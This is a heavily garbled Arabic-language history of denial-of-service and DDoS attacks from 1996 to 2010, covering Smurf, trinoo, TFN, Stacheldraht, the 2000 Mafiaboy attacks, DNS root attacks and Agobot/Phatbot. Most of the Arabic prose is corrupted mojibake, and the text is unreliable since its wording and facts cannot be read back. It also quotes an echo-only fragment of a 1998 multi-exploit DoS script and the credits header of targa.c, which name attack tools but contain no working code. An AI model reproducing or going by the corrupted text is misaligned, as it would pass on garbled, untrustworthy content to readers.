AjI^JI CjI j^VI £>i& ^ikU j .(1^ 4nlni d£j3l 11a ^ ^<JI 

1997 i- 

Jataj J^UIojI t^lj a J .1997 ^ lWj^j 1996 ^ j^jl J IRC J^ cj^j Sj^I 3^aJt cjU^a CjI^j 

f J j .{unpatched) 4 ^ > ^* Jj^j J^xjI jj^I^aII di*^ dip. bonk j boink 'teardrop DoS 
cjU^a .SYN flood c> IRC network Undernet f s ^ill 

(.n.. 11 di> jptel ^ dip. 1997 flc J cj&UI cj^JI jISj . f jJI s^L* J! jj V IRCg dA£^ ^ SYN flood 

.^j jjj' j jW c> ^ ^ <-*3 j-JI <J*l>^ (nonmalicious) 

^ a±^1\ cjIjIa^VI gi L^X^aj ^5 ^JajjoLi (bugs) a jr - j: *Ua^j VI ^ U DoS U!^Ulaj| ^1 < ^>^1 LUj 4 j^VI ^ j^Jl ^Uuulb 
Microsoft Windows TCP/IP stack Ckj^ ^Ua^VI c> <LuLj i^IUa t JILJt .S jj^ialJI Jjii^ull 

dli j Ci^ jc ^ d! >J! p >11 ^JUj ^ di^ Microsoft Windows TCP/IP stack ^ ^ .»l f 
^3 j > ^ cJ^^ ^'3^° uj^ ^ ^3^^ i^j^ TCP/IP stack (jjj-^-a ^ ^jjI^ .J^I^jj I^jI c_ li^j t^j^ > *a (3^^^ ^ <J j^ 3 
L^j^ c^ jaj ^Ij c^ jaj cillil .(start/end/offset conditions) ^Jj^\/^^\f^J^\ ^j^? o-^^ 

'(amplified DoS attack) DoS ^ > ^ '(reflected) u^l^VI Jll^l ^ 1997 ^ Cjj^i <SUi ^^kl 4^ 

^ ^1 ^ jLk ^ jaJI ^l^j jl (jjjia j& cillij ^ > bllb Smurf djU^A .Smurf attack j 

.C/a^ B or/16 network aL^jI^ a<^1 lJ^\ ^> ^jaJI ^1 J^»j J^Uj jl iClass C or 124 network 
.Alidll (broadcast address) ^ c^) f ^ cJ^j]j ^ j.^q^l r^W Jjojj^ q\ ^ ^j^Jl A^li^aj ^ig-<J! ^JL 

<^UJ| jjj^ jl^a. ^l^kl^U ^13 o^j '(Kbpsl4.4 dial-up connection ^cr^ JL^jI ^ 

1998 <4 

Smurf djl (J^IxjII cjI^jjuoII ^^^IxjuIa ^3^^ '^j^^ ^ b^JI^ q±i jjUail! ^jia^c. ^ 

JJ jJ1a£1I ^3^'^ jj;^^ ^3^'^ L>^ Cf^* J 111 ^ ^i^aj <JU3l 6 jia^Ji CLn^S 

^juoijl pjhvi ^jj^^l $ A\ I^j ,A-pjJa3l tjlj^*] Cy* j ^^i*^l o^jlill *L<ij^c. jj^3I ^^>^ djLi^ JLajjV ^ "i^ <J£ <i^. jli j 

DDoS ^Idjj J^ 4998 ^ < ^iio J ^ j j (fapi ^J^j) DDoS djl j^l ^> aJjV! ^-iUull 

4_A^ig_Al3 CjV jlij ^ ^ *j C5^^ sjj".. 1 ^^^Vl (jVl ^ a\\ (j^j '^ij j v Jc ^UucVI V^j .^^L^JI/JiaslSI 

t ji >' ii UfLua jjlJ ^il jll J dj ^IojI j J^ixj <LLouj ^al (Vulnerability-based attacks) <> ^ > ^ 1 ^lill dUp^SI 

^a^Jl C *<!■» > >i Jalij ^al^Jjajlj 4_^L^.Ull <-d^Jl L-Jp^ dil ^jjuj ^aJ .llj^ <9jau£-<Jl (bugs) ^J? "J.^ U^Nfi j. < u. t .q^ jUj ^ 

jI^V d^j£^ L_aL-bl -uilj (fragmented packet vulnerabilities) *\ < *^ >^ 4998 
( yfki3l ^ JjS ^ l^jjA <OS fingerprinting c^J^ o^) y ^ Jjij&ll fLkjJ ^ 

j 4£fxi ^jiai^l j <*^U> jUlkVI ^1 tilti ^ 4_*jta LLjI a Jataj ^ j ^ j ((packet normalization) 

dljl^j t^laj^ll ^1 j;*^ all ^ 4_jujUja3! q\ Lg£ jaII CllAna] ^JjlLJl dAjjjJa dj jj^ J t^JjuJJ'^Jl ^£jL±^Jj <JaC JaLuUJ 

j& (Jj^j t—fl jjuj ^^lill *L<i^JI c ^ j'xs J 6 * cs-^* ( ♦ 1 * * ^ cl>^ cJ*^ j^*^ t^j^j^iill Ajjjaa j-<J AjMI S j^^JI 

si_>j] ai^j .(Unix shell scripts) o&j* ft^^j sbi <^a DDoS exploits 

^la dia (1998 ( ; ^ t(jjjtfll3 l^j) 'rape tdjIj^Vl s^lj .^Jlxi (jj^il \ $ * & ^jj ^^jII 4_xi^JI < . ^ a ^ ^ <c^juJI 

echo "Editted for use with www.ttol.base.org" 
echo "rapeing $IP. using weapons:" 
echo "latierra " 
echo -n "teardrop v2 " 
echo -n "newtear " 
echo -n "boink " 
echo -n "bonk " 
echo -n "frag " 
echo -n "fucked " 
echo -n "troll icmp " 
echo -n "troll udp " 
echo -n "nestea2 " 
echo -n "fusion2 " 
echo -n "peace keeper " 
echo -n "arnudp " 
echo -n "nos " 
echo -n "nuclear " 
echo -n "ssping " 
echo -n "pingodeth " 
echo -n "smurf " 
echo -n "smurf4 " 
echo -n "land " 
echo -n "jolt " 
echo -n "pepsi " 

^ (exploit packaged) J^jd^i lajju^ <x^jl<Jl djIjI^aVI <L>t£ uj^ c^*^ j 6 (c^^ 

lW> c5^^ (precompiled program) j^ 1 ^multiple DoS exploits ^ l^^t? ^-UuJI jl jaL^I 

^^kl L^judij jjjojVI ^I^jjujI ^l) j/iu^ia <iajaj| ^-^j targa.c < *-^ J i^iLujVij JiJIj ^jj^^^ 

C c5 ^ J 5 ^ 1 t^H e Targa .(Agobot/Phatbot ^ 2003 ^ ^ 



4 https://www.facebook.com/tibea2004 
/* targa.c - copyright by Mixter <mixter@gmx.net> 
version 1.0 - released 6/24/98 - interface to 8 
multi-platform remote denial of service exploits 
*/ 

/* bonk by routeldaemon9 & klepto 
 * jolt by Jeff W. Roberson (modified by Mixter for overdrop effect) 
 * land by m31t 
 * nestea by humble & ttol 
 * newtear by routeldaemon9 
 * syndrop by PineKoan 
 * teardrop by routeldaemon9 
 * winnuke by _eci */ 

CAjLoi^. ~1 iklLujj L. l] laJJ l^jlj 'b^y* <J^ (jg& IP C)\ J^ 0 l . ^ a £ ^ ^-■tu.nJ <JI V targa DoS <— ^-Ia^J Asu J^ 

CjIc j ^ * duUi iCA a^frll i>A& 4_i3l*i S^L^ .( ( ; J <*-^LaJI 4_xJaj|) ^£^jli3l (JjUaJ (jlajc ^ - a3l 4_xJaj| Jc 4ijjjui>» 

t fllla a ^aUaJ 4 ft^t g ^j^J ^ uj (JS tdjLa^Jl (JgUnYl 1 g i£ aJ 4<JL^j!>II "voice bridg€S" L jl IRC ^ ^Ia^JjujL t^lA^l^xJl 

a I laJLujI J a£^j]|j Jjjl^xJl ^Uaill Jj ^ flxjJall Jal j-g (j-a -ja-vlti J 4_jaiij J^j- ullll li& Jl / a c3JJ jaUi S"^-* ^I^JLuAj 

."rootkit" j backdoor 

44 ui,Vi^l j 4 <^)jl A JO^ S^jujUx A a>_nj£ Cj^L^. ^31 4 jj jJJ^I 4_xJaj| 4 a^l g ^ Jc Sj^l J 1999 J 1998 cs^- 0, 

.AjaIUJI iAij^ll cMiAj t^iLJI/^iAxJI CjVU^j! t^iiffl ^ Jlkdl Sijj 4JVI Jj* unit Jl Cij jjjVI c^k ^311 ^Uj ^ 

1999 *t 

<C j^all <Jjoj J^JI jJl J^g-ll (J^-^ J (jg& l!^ 1 U^J*^ C — ^ U* ^ UJJ 1 "J U U2JJ^ ^ 6 1999 J 

4(acjjJI 4^^JI t> jUj^JIj * (scanning) <>aaillj (sniffing) c^iUli <yjj^ Jl^t J) {distributed computing) 
aja^j (.{reconnaissance scanning) ;^U^VI £^ f^Jj 2^ f *^j^l) jIaj^I s^V j s^lc-jj 

ajaxJI 4^SIj1I .(fj^JI ^ SjkuJtj 4 (embedding) u j*^'^ '{compromise) cj^j^VI '{target identification) 

J DDoS iiaiil U (Blasterj 'Lion 'Deloder 'Code Red 'Nimda t JIUI ^jJi u'^' c> 

.DDoS ^ 

.Stacheldrahtj 'Tribe Flood Network (TFN) <trinoo) ^^Jl DoS ^ j^bll ^U^l ^1 j Jj! ^ 1999 ^ 

c^jUi j ^^jj ^1 j Lij^ j£i U£ 4 ((Agent) f^jJIj (Handler) cjUJU-aJI) ^ki^j ^UJI/J^I g*\ jj J£ 

. IRC^' j^j IRC 1999 ^ Ul£ 5^ ^'^1 .DoS ^ ^ j 6 J^i^Vlj 

<ja Loj ji& ^llxJI pLaJI J£ Sj >«Ti<ft\l IRC ^^c- u^ ^3^^ ^u*^*-^ j ^ Aj^I^. ^ IRC ^^^^^ ^ ju^^ ^1 ^jl£ 
cj^j ^1 4trinoo DoS ^ aI^I^I ^j^JI 11a j^J J **1^!>U a^W^ jj^ <slx»UJI ^ aa 1] <jU^3I 

4^j^JI 11a ^ ^jjiiijJaJI 2<500 ^ .IP spoofing ^-y^ 2 ^ UDP c> u^j^ 3 

pUJjj j jqu^H cjI^U^ Vij . nin ^ (rolling attacks) ^ jl^Ji CjU^JI ^ 4U^ J^3 u ^JaJ I ^> 400-100 t> DDoS 

jjjlaj (jjjia cjc- ^1 <luil3 jj3! jjlkd! ji« V {distributed tools) <y jj^^ ^ l^kl^l u^ 

<L j^UI cjI£^JI <JUi JSi ^lou {point-to-point) JJ <^ <> cj! j^I (2000 ^ J ^ j c3^')Internet2 

(j^a^S dlla-a .l^ilfljlj i\ * j L ^ ^ Jl AjullxJl 4_1^jujj ojlilill Al^ui CjULjajiill A^.lj L_flJjJaxJl a iklLujJ jll CjIa^JI 41^1^ 

^jjj (4^3 ^Uaill o^j^ ^r 1 ^ ^j^' cJ^A? ^ L5^b) {Scripting of vulnerability scans) ** > >y\ \ JalSj 

du3 du£ |jj .CjIcLuj ^-xiaJ (jj>^r> J (jjqj^^l (j» cJVVI CjljJaC ^Jj tl_flWl 4C!jUa3I (jljlkl J JjS^J cJ^I djl^^^ l 
.^^j o^W^ ^ J ^Sniffer 'Backdoor <>? 

V S jj* - gall <c j^ all ^^j^JI (jjjjoLiillj ojj^AxJI 4j£jjoj!>1£3I DoS ^jIj^I ^ laJLujI ;) ^c- j ^ * Jja (JjjjLoj ^^jI! CjIa^JI 

jj^jlill ^ cJj^ ;Ujj£j CjVI^JI £J*^ ^ . NjaViti CjLaJ jUlbj ;4_}j,li3l CjIj^VI ^.Axll (jjoij IgJ (jj^J <J> (j^J 

S^Lja-oJl CjIa^JI lLu\£ .JjUajll AjljojIj d it a^fr ^jjuj J 1^. Clijl^ A-ia ^j;^ s-UakVl C5"^J '(coding efforts) 



jAj s jJI aifcj 1 1999 



^kljl <j!)tk ClL^lj c^Liia jir > (jllaj Jc <illi q\j 6<UjL<u» dlLaaA 



Tribe Flood Network 2000 (TFN2K) 'Stacheldraht ' Tribe Flood Network (TFN) ^ VM] 

j^i^ CjU^a Shaft ^jj^ ^ j^Vl ji&l I jjIS 

bj ^ jj Jx^ (J^LV! ^ J jV! Sj^ll) CERT 

Ac jjpJI cjU^UI! cilli ^ Uj) [Distributed System Intruder Tools) fU^l ^Jjj cj! j^I aJUJI ^ ^ 6fJ JU ji£ 

J^xJl jj .(<cjjJI a^^1\ jUjaJI djljjlj (.(distributed sniffers) j ju^iul l '(distributed scanners) 

b^ .(C-J^l J^IJ AjL^JjojVI (JJ^ J tdljjljyi A-d^ ^^xi^Ld j t^Uaill J jjjoui j ^JjjjAxJI ^jxi cillj^ o^Astld jlaj d j ^ 3JLauJl ^ laC. ^5^31 j 

ia^ jl(JI ^aJI 6(Ujj 30>) c5jja jUa] ^ t*lb JU^ Jxii bU j ^DDoS ^ ^^13 o^^^ J^a^ c> j J'J^ V 

o^j^JI Sbt cJL£&! i*xt> J^xJI 5-^jj iaia ^xj Ajl tdjtajlLJ! ^ j .(Ujj 180 <) cJ^j^^ ^aJI j (Ujj 180 -30) 
ch 3 j*^^ ls* ; Shaft st^' .Stacheldrahtj 'TFN 'trinoo ts^-^ U-^j 6 jj^^ aI^L* 

(jlasu oLlljl Cllji^. j 6^5^l^Jl iajl^xJl ^^ic <ila>Jl (J jJl j tSAaJLaH jll j tbjjjl ^.L^Jl ^J^^ ^ jll ^j-d 6 jjir > ^> ^I^C-I ^ bLoifl 

^Asu t(( l.ffll j ^LjaJl ^J^Jl AJa DOS J^^ CjVI^jVI jjq ujj Jilxi CjI jj-d CjI j^VI ^j-o A^lflll l!^^^ l!-^ 

^J^J ^ (J^-^^ 4_lx^J (JjS Sj^Vl jll ^^JjoiJj , CjULjajiill ^3^" ^VAstxi ^jc ^^IjVIj C<LqI£1aH <juj^j^3I L_fljUaj 

(t^l jjloaVl Cj^j) LaAic. j J jJdl<Jl t 'a^t ^^Jc. J jj^a^Jl ^ *^J^ UJ^ ^ft^JC- ^UlUj ;4£jJa3l DDoS f L>* 

jjjLj ^1 'IRC £^ j -0 , ^-* a AaaU 4->^>^ J j^-^ DDoS " b L - ) ^ c - j ^ Cy* ^^y^j -^3*^^ ls^\ ^^-^ 

.DDoS £j! c> ^>J^ 

M CA^^1\ JiLd I^jI iAaj ^3 6^ aa^JI . jjg l— iAaj j Y2K ^it£ j j^ii 1^ W^j Uui AjI^jH 
Kilo ^Kj2^1^2^ Year ^ Y) Y2K .^Ijp! ^ u^ullj >J>sh \1&xa ... LjJ fi^ q\± 2000 j»Y2K 

.83 AxLuaib lj j^iUJl ^ j^iaj S^Ia 1983 ^Luali cS j^i^l d^luil ^jjl V^J u-4 kjjail] ^lilluil jf^il J-uaL dna. .(uflil 

(j-a ^jjju j UjLu^ 4-ilkL» jjP j- 00 A^jjlaj n ??? T ♦ ♦ ♦ ^IsJj <-jj< ulaJI n UL& AALuloJ Qjg/nj f Ij^l I^j .CjI nt < in 11 AjI^j ^ 

Jsiuu» ^ !!AJL- AaiS «< 98- = 98- 00 : v ^ ^ ^ 2000 ^ 1998 6^ ^W 1 ^ jtuiluiV! ^! J^c- j! 0l S^iai .JSLUI 

[Figure: chart of DDoS attack size (Gbps) and number of attacks per day, with axis ticks at 2000 and 2001. Labels recoverable from the image: "Era: Experimental"; "TFN Attacks (eBay, MSFT)"; "DDoS Arsenal: SYN, Spoofed, ICMP, GET, Ping, UDP, Bad Protocols, Connection floods, Reflection, Application, P2P, DNS, Backbone, SQL"; "On The Horizon: Web 2.0, VoIP, IPTV, Cyber Terrorism".] 



2000 i- 

Smurf <jI j^y I^a Oz.net u^j 'o^^lj 'i^W- 43 (ISP) y^*-* ^ '2000 jMj 18 

±± l^j^ jl£ ja^l liA yi jill j^iixJI jl£ (Stacheldraht g^jt <> ICMP Echo reply flood ji) 
s j^ij ^Semaphore c> ^ <^HJI jjjI jll s j^lj ^ 3 ^alaJI jjjI jll $j$aj L-^l j£3j tiaia Oz.net ^Ij^JI 

A kia all <aJaiall Z70 A^Jj^I JJJ* ^J^- y^ J^iiH (jl cA' ^'j^H J^J .UUNET t^-Jl ^ jj* c> j^jl jll 

l,lia. <UajjjuuJl gl\ jxJl jx» ±J^xl\ .Ua L_ DDoS 6 2000 J^l J^ 6 (* J^£^ ^ L>* £jj * »" Q J 1 ^ <^ 

10 £-*) eBay ^Ij^^ ^ > ^ dujliVI 3-^j^ ^ \jj j-* jH j .ciijjlj^U aj.uujj]1 "AjjLaiill ^.UujjVI" j-a j^£1I Ta1xAA\ j 
d£>jl>V! aJLJI <iaLaj jit 4(1999 JjVI <jj^ yi jjIJ uj^ 36) Yahoo ^j^VI '(*^*-ll c> 

jll L_i&ll ^ ja.Ha <(ujO 1.3) Buy.com ^ Jpi\ ^ j^ll 'online brokerage E*Trade 
^ t> AP*^ r^viJ .CNN ti^j j^ui*JI jW^Vl 'Excite.com ^ j^yi -Mjj 'Amazon.com ^ j^VI 

^1 jjV !jj£la li^A Ij^ajl 1 .<-— iUlajll <illj jj3 jlll Ji^ (J^-^ U^ a Jj J ^ ui I (illil 6L_jij^L<ij ^a a dlli JJJ-all ^^>^ £^l J-*H 

Sjta] jjajla^JI j>» -^HaJlj 4 jVI (^5^- Lai cjU^jj ^^Jc I jLI tillil t^Lij jjj^I! dal &a^JI j>i c5^>^^ 

jAU (^ic J?^^ 4(JH<J| J^f^ ^5^- \* jj 6,^1 a JJC. L^J j£ jxi jll c _ 5 -icj tl^a. 4^a.U ~* La j£ AjJa CjLaa^Jl dljl£ ttilli ^xij .^jl 
lju£ j^c-Vl ^^ic Axiisu 6 jAU tcillil 4 a^nj j .CjIcLoj Cj^j SAaI ^ j-<Jl t^lli CIijIj jL^ajl J ja. j j^^aJLauJl 2000 

L_JJj3l CjLa^a jj^ jll j-d I jj£ <lL ^aJ 1^-LQAaJLoLQ jl ( . UjuoJ jV 500'000 J^ 1 L - J J Jud ^' UJ^ (J^^J tl^jl^jlc <JaJ jxi 

jjjx» ^J^. 6jila c _ 5 ic Sj^lS L_flUaxJl ^jl^j ^3 J&\-£ C5^^^J ^JJ CIijujj] 4^^aJLaixJl ^ j^gJl <Ljia .CjU^IcVI J^AaJj j^U 

^1 j^ill CjlLaaaSi ( . n£ <ij j^aLaJI ^ j* .^J^ T ^ 6 ^ <^ cJHll j>» I j^£ I j^ dj^a c^^c jjoJI jjj^I ^^>^ f 

.DDoS f j** 2000 ^ c> jj! jjs j^ ^ cjHI^ cj^j daJ ^U^aJI ^ jU jl£ 
JljU ^ jlLi ljSIII liA "Mafiaboy" . DDoS^W^ ^1 Ul£ j^l Ulc 15 c> ^ ^\ ^ ^ 

j^j j^uaJU 4_Jc; ^Sa. . jaU ^ JjjI ^ill "Project Rivolta" ^ i_ia.U^a Ulc^ 15 cr^^ 

.ii^Vi ju^v jSj^ 

2001 ± 

DNS ^^^1 ls'^j futuresite.register.com {reflection DDoS attack) o£*^\ j-j^ fj** '2001 jAj 
<jja diaj djUlkll ^jAxJI J^j^ ^W^^ -U^ ^j^- ^ f^^^ 5^ DNS ^ W^jV 

^Ui l^iS c_i 36 jq jjaJl CjU jlx-<Jl dlLjjl ^UlU diUiLJl £>i& .DNS C> j-ala. Jlxlj ju£ DNS l5^J ^UauJall 

jjjlij ^aJ^J 64_ijHl ^ d^bUu-a 90 60 1 U ^ IP ^j' J^^ JJ>^^ J^J^^ l^lil .4_iauJal3 

.DNS ^ s^l jll ^11 220 J» DNS ^ gSj- 

^ ja-A ^CJJJ ^^jll till) j-d ^1 ji-aJ L-JXJ> ^\\\ j-d jl£ 66^J^C 

.1^5 jjla ^jj jl c ^idi3 ^Ij JJJ<JI ja. 

c> DNS cjI jLuilual ^ jjll ^Jlx^l sjIc jjaj jl <d t^^UlajVI I^J <jU1uiVI DNS ^ ^ < j->j V <jl t J j^l ji^j 

6 DNS^^ 3 c ^ la J ^ (J^- jbjC'l cillij <jl j^alaJl jj-a jJl (jUaj i _ 5 ^a 6^ ja. jxi jiiJl j-<Jl j-a jju^C dL^lauoj 

aAaji galll JjLaixij <J j£ jjjjJl CjlknlaJj djjljVI iV j^ J^J^ '^blU ^U£3 ;lstxi j^VI Hjj jl ; DNS(*^I ^ ^ ^ ^ ^l^cVlj 

.DoS vulnerabilities ^\ ij 

2001 plfi .I^j fit (jlc I jjjaj ^3 (IRC I j*v^"ij jjill J JSVl jjjUII ^Ja*^ jal j 4DD0S uU^ ^ *^Uj cjj^IojI 
JaxJI 11a ." Inferring Internet Denial-of-Service Activity" u' u^^ : ^ j ' ' jj* ^ 

V <jV J^6-ll J L>^ DDoS -iabjlj jjjUs ^ ^^aJLauJl AjjSjI! .djjjjVI (jUaj ^^ic DDoS Jaljuij jc ^jjlajlb ^IS 

.2000j 1999 

jiasu dlLula .DDoS ^baA tilli ^ LaJ tdjlAa-gil Ijj^la li^A \ fr5l*a CjLd jIslaII Ua. jl jj£j <cUj^ ^ jjWH L — ^ JJ^^ J -0 

LoAic. ^3 jl<JI cJ^Vll $-L_ixlt J>»lxil3 l^jl£djjj ^^Jc ^j^Jall Microsoft ^^^-V * j^jj^^ cs-^* DDoS ^HaA 
(jlaxJ *l£ij ^-^\ lS^-^> L>^ llA^*^ dl^LaJ CjLo^JI (J^asu 4_aiijli3l ~y gaJ La^jc jl ^-xa jl ^J^. ^cjlo (jc ^-IjSVI 

DDoS (j-a^ jllai 2001 jMj ' J^l lW^ ^ j*«JI ti^V l?^ j 211 ci 1 ^ 1 (J^J^ (> J^Vl ^ jl J*ll 

<jl£ J^-Al ^l^ ^ J?S^ ^ .^.^J dllc JjuJI Aj^lxJl Jjj-Al ^^P" L>^ 4-*-^J J ' " J J^j ^ J^J^^ ♦ (j-a ^-Ij 

jtg-a> c ^aj dijjljVl difl jjoj jjfLLaJ 4 > <al ^ \l DNS ^ ^J^T* (jl 4 qj'q^ V difl jjoj jjfLLa dijjljyi A J^-J f^G- cJj^ > ^ 

a^jl ilia ^J^ 1 J ^aJ .jj* N^l. ^jAslSI (j^Jj L ^ ^aJLud^U djfl jjuij^)fLL<» <£jjuj <J£ LAaC I <ilij a g 1] <jJa^stxJl jllll 

IaaU ^ j^-gJI I^a .<Ac- jl! Jj^v^l 4->/n jj jl jll j^-^ lJjS dikLajl c _^j3I j jp <jjjUc Jl Microsoft ^ ^UujjI 

.Z2 J] (J^^l lW-*^I J^ (JLlfl jjoj jjfLLa <jl£ (_^i3l t ; 4^ jui ^ ^-^J^ 

2002 * 

DDoS ^ j-^a I j * j^>^ ^ ^ti L-i^i L— li^ 2002 ^j-^ 'DDoS <>— ab&^J jj^-la ^>^l ^^Jl &^a J 

jli tillil dujjjVI *v^^* ^ jjiiil ^jajU. DNS .^j^^ (root DNS) ^j^^ DNS ^ 

<J£joij <Uajjjab<i L^judij ^^jI! 4<jj^JI ^! 13 <^ ^ ^ 1 ^ ^ DNS AaII^j ^jjs IgJjcaJ S i^IaSI j^l^ill (j>» ^jAxJI 

13 C> 9 6 ^ J>^1 4il5a^ Jallj ^ .DDoS f C> Injuij jaj ^l^klujU Ajji^Jl ^1 jaJl oi^ ^ 13 Jl DNS J^- 

D^l j <cLoj ^dJjojl j^(gll m ^ j^^l ^.LaJl ^J^^ 
^ jSIj J jJal . J££ ClijliVI g-i J^Ja^ jjjIj i^IUa jlll u J^JI *^ Jj^j DNSlW (5 J^l ^L<u^i3l JjJaL jll L-flS jJ tilli Asuj tJaia 

_AjUl13 6jLja (JjS2 6<il3i ^ j 

2003 ± 

Sjj^ll CjI^I ^ ^jAxJI ^ J j^jII 11a (j^l jj . j^Jaii CjI^j ^1 CjU^iJIj ^ j^JI ^alj^ ^ lj^ V ^j^j ^J 2003 ^ 

,DDoS A^jLulLg (jVI Clla^ai ^^jII j t^jUaill AjljojI jll AjujjoJI 

.(Spam network) ^3*^ ^J^^ (yjj^ ^^f^ ^^j^ 'DDoS tijJ 3 ^^h* q MU'aW ^Vjl 

o^LjaJI ^Sl *^ 4^1^ I j jIaJaldl l t"spambots" ^ 5^.1 ^ (antispam sites) ^fcWfl l o^LJaJ! ^1 jJt jU. U£ 
<i^al jia CjU^a I tW32/Sobig £)\±i£\ j t^Uall DDoS ^ ^I^^Ij ^Uij .(antispam sites) gJ^ll ^jJJ 

# 4jUl13 <^j^<JI ^JLftcV I jjI^ ^-jl ujj^ u^^^ ^^j' 
cjU^I CijjjjVI As^\A\ LJaji dix^ ;CjVUJI .DDoS c5 j^Vl aJUJI ^jI j^JI cjI^j t^JlSl) 

'(2000 J^^J^ J& ^ *^J^^ C5^) W^J^ ^'j^J^' L>^ flWl CjIjj^ (jxi jJ ijic. ^Uj 4^ jJl 

L_JJj ^J-d jLja^.V ^ " b J^ CIjUl^JI a 4 jTjiln j^ii ^JJj CjI Ala ^^^Jc ^ jJali ^^1 J DDoS cJ^^I £y* ^Ia^LojLj 

A ^ > >i j-Al 4_juo£jcL<JI DNS ^"^>A jljC. ^^Jc j .(^ilall) ^Ld^Jl ^^d^Ld CjI^Jjuj (JjJaxA (^^. *^J^ C-ljau] l^i£J j laJJ J-**^ C5^ 
^jJa AJjUui dil (jjuj ^aJ > <C jjjobd (jj^ ^—O&J 3 " a '^.^^ S-^J^^ (>< ^ Ala Sjlils ((JjaJLud^AI (j>» ^jSj ^aJ (j\) L-lau ^11 (j-d <jl£ tlLLoj 

L_flWI CjI jJoC (j>i ^J^ jl j^*^l lV jl-^-G ^-O^- iVl-^Jl (J^axJ ^ 6 C5^>^^ ."S^^V^ J^^J **— ^J^VI (^Z- jLdlll c__lxJ ^al 

.(jlj^VI Jll^l ^ l^j^ y&&) CjIa^JI jl CjIjVj^AI 

|j> ^iV. Ij^-I DDoS ^ 
^-iuiUui l-jUoiV t^lli ^ Uj tAijLaJI CjI jiaJI ^ Liajl ^l^klaj^l ^ DDoS j^U ^3 .mjj^I Jjqnn^l ^ 

J jlaJ IjjJ^a CIaj ' jJaS U jLi 4_ixi^c.yi <juajujja1I SjjjaJI ftUS C5 Jc DDoS f (J^ 3 ) ^ '2003 (J^^>*J^ ^HJ^ 

L— -^>^a l^i^l 6^^^j!l3l (jUaAl (jiajC ^ ^j-<Jl 5-lj^i cJ^-^- (JJ*^ j A ^ Sl jl^-o 6JJ j^Jl SUS ClA jL^. .^-Ac (jiajkll ^aJ (jjJ^J^I 
Clal Ala 4^ jj S^lclj 3 > <al ^ 11 DNS ^ (J<^^ uj c qin-s <il3i ^xjj t^j^jj oA^J ^1 lS^^I S-^J^^ £7* J -0 .f 1 j>^l 

>g _£jj*Vi ^jj l^^^j j^i s^j 

DDoS (SCO's Web site) lsW*-^ 1 s^j ^ 6 j^ 1 J ^'j^ *^ '2003 J 

bj Clljl£ CjUl^JI jL jlijcVI SCO L>^ ^J^'J -O^j^^ L>^ ^jJ 3 djljjil 5-xi^kJl (jUaj <J*^. c5^Al J <A^C- 

<JI JV ^ jj^JVI ^jJI fjz c^l <^ Spamcop j (^ jj^V^ ^ Clickbank '2003 ^ u^ii* ^ 

^^Jc ftj^lS Clljl£ t^aUl <«jJaJ Asu ,^ J^JI iVI uVVI J^JJ La Jc C-Aajuj CjUl^JI .AjjS DDoS I— ib&^J I jjJa^su (^ccj^^ ^J^' 
m A *\ <Jakj ^1 Jj^j (jl Jj3 Jj^Al ^^>^ DDoS ^ J^A dllaL >il ^^jll j SjjJaJx 6jiAa ^** 1 JJ^ 



2004 J- 

^glc S^lj^Ia CIujjj] 2004 J S-^J-^I l— iLaaA ~\ l^Loai ^aJ 4iL < ** )l <g £j £x» ( . lla Jl Lia» 64_JLJl ^ilj^ll dlli CjIa^JI Cj^alai! 

^ jjjj i oJ J UajjJ AS Phfttbot 'AgObot ^J. 1 * ^ ^ U^^^^ ^L<LkjJa Cj t"<K^.* ^Laijj i ^jjQj - ^all L_flWI CjUxj 

,aju Uus Jjj^aiiill (j-G Phatbot c (JjjuJI CjI^jJj J £>i& ^tii CjVI^JI lP 3 *-? J .DDoS ^W^j 3*^ 

super-" J c^iJIj JU^ <> 2000 ^ J ^ ^ ^ dl>uJI <> A L&ys Phatbotj Agobot 
lU*^) Phatbot^lAa ^ j^* cs^^J Love You" jj^ ^ < ^ J^ j c^JI li& ^ j "worm 

^JjUj JL Phatbot) ^l^aJLuiVI 4-1 1 gaUll 3 a al ^ a tjlill ciiu^jll & Jl^VI ls 1c < (u j jj^j <-l^ cs-^ 

Ljajl (>5 £juaiall j diljfli S-l^^ tlajLuo <LL^<Jl ^iiijJaxJl (JjjIjjSL Phatbot Alo .(^al jVI ^al ^Vlml (jC Cjl <uLlJ j 

iiiiill ajII J ^^1<JI Jtl^VI J&l c> s^l j ^ Phatbot '(Phatbot ^±5 ^^j^ (J&j^ 3 lf) 

> (<J aj LLj| jj) DDoS ^ (> ^] uVl W) jMj cs^j (automation) 

2005 J- 

^ jl 40000 € ^ £ jj^ U jL> jllj jaxx.de jl ^ 2005 l>^' J -y?^ jV^ 1 <^jh ^ ^ 

.jaLolaII DDoS 

2006 J- 

^IS t^jj^JUi cJ^A^ c3j^ dia^jjoj! DDoS Cy> aJjuoLoj ojUc ^^Aj .4_iij^3I djlcU^JI ^y* ^ jj* 1 DDoS ^ daj 

U^<i ^^ic AiLjaV (jj^lUi U^jj ^ botnet u -0 ciulS Ui^ic. t jjI^js 23 ^— i^^ajj j^^^>^ 15 

2007jJ—yJ ^ 

.^U oAxJ Uj jluit ^ jLk IP (jJjU^ J jj^a jll cilill diVl^ j ^> ^AsJ! <^J^3 S^J^ DDoS 

2008 * 

5JI jj L_J jJJ jJ! ^j-d J^^^ L_llla dlla t^lxJl (J?\j^\ e>\S±i\ ^glc J ga^i] jlll j^a a <C j^^ a dj^La. 2008 J^-^ 30 

< '^A^JJ cJ^-l (J^^l ~ laJLuJJ ^\ (jjaij ~\ Ikloiij ^JjJ ^ilalilU <C d^A dulfi Cilia _ jj jlaJ (j-a 

Jjoic. (Jjj^c (jj^la (jc U^. jl jijUjaJI (jjjlil! ilijj" ^jl£ .ciiS jll ^jiiil ^11* jjc. 6 jW-> c^iJIj 'Scientology.org i^LujIj 

.Cji jll ^J^ 3 ^-lld JJC. j-<Jl l5*^ l$'A\ J 

.(Conficker) WjI j^V 1 c>^ ^ j ^ J^ 1 cr 13 ^ j j ^ (i ) '2008 jf^^ 30 

^jljlkU aIS Cilia jjojjj£jU» (Jjxjoij ^ AiaJl ^jAslSI ^ L_0stjJa3l Jallj J^iij 

■ijj^ u' ^ cr^'-J ( -^^ 4> botnet ^ j j^j^f^l ^j*^' -^jj m^^' l> 

2009 ± 

. (s^Ul ^LVjll ^ <_D£i^l f jj Uk) 2009 jJjj 4 ^ cjL^l j> JjVl ^ j-ll cjS^ ;The July Cyber Attacks 
jUsJI dilkl dip. botnet j^j^f*^ *jtr^ 166'000 ^ DDoS . V ^jjj^'j 

2010 * 

^ DDoS .u^jl^jj 

